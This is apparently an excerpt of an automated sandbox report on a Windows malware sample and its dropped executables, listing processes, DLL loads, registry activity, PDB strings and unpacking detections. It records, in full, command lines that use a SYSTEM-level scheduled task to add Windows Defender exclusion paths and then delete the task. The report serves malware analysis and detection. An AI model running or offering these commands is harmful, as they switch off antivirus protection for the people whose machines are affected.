Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Program Files (x86)\byHW9q\byHW9q.exe "C:\Program Files (x86)\byHW9q\byHW9q.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini	Jump to behavior

Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: pid.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: hid.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: tbcore3u.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\byHW9q\byHW9q.exe	Section loaded: tbcore3u.dll

Source: C:\Users\user\Desktop\2976587-987347589.08.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Documents\XY3LL0.exe

File written: C:\Users\Public\Music\destopbak.ini

Jump to behavior

Source: 2976587-987347589.08.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 2976587-987347589.08.exe

Static file information: File size 30887936 > 1048576

Source: 2976587-987347589.08.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58200

Source: 2976587-987347589.08.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 2976587-987347589.08.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 2976587-987347589.08.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 2976587-987347589.08.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2976587-987347589.08.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 2976587-987347589.08.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 2976587-987347589.08.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: 2976587-987347589.08.exe
Source:	Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: XY3LL0.exe, 00000008.00000003.2222500406.0000000003FAE000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3239126887.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe, 0000002A.00000002.3239456656.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000000.2666597561.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe, 0000002B.00000000.2687304360.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe, 0000002B.00000002.2695070595.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, QmbK8U.exe, 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmp, QmbK8U.exe, 0000002C.00000000.2694474917.0000000000638000.00000002.00000001.01000000.0000000C.sdmp, byHW9q.exe, 0000002F.00000002.2713673998.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe, 0000002F.00000000.2703249364.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, QmbK8U.exe, 00000030.00000002.3201537025.0000000000638000.00000002.00000001.01000000.0000000C.sdmp, QmbK8U.exe, 00000030.00000000.3184324160.0000000000638000.00000002.00000001.01000000.0000000C.sdmp, byHW9q.exe, 00000031.00000000.3187483012.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe, 00000031.00000002.3203863917.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe.8.dr
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source:	Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, XY3LL0.exe, 00000007.00000000.1996508363.0000000140014000.00000002.00000001.01000000.00000008.sdmp, XY3LL0.exe, 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmp, XY3LL0.exe, 00000008.00000000.2013520702.0000000140014000.00000002.00000001.01000000.00000008.sdmp

Source: 2976587-987347589.08.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 2976587-987347589.08.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 2976587-987347589.08.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 2976587-987347589.08.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 2976587-987347589.08.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\byHW9q\byHW9q.exe

Unpacked PE file: 42.2.byHW9q.exe.2980000.3.unpack

Source: C:\Users\user\Documents\XY3LL0.exe

Code function: 7_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_000000014000F000

Source: initial sample

Static PE information: section where entry point is pointing to: .mo:

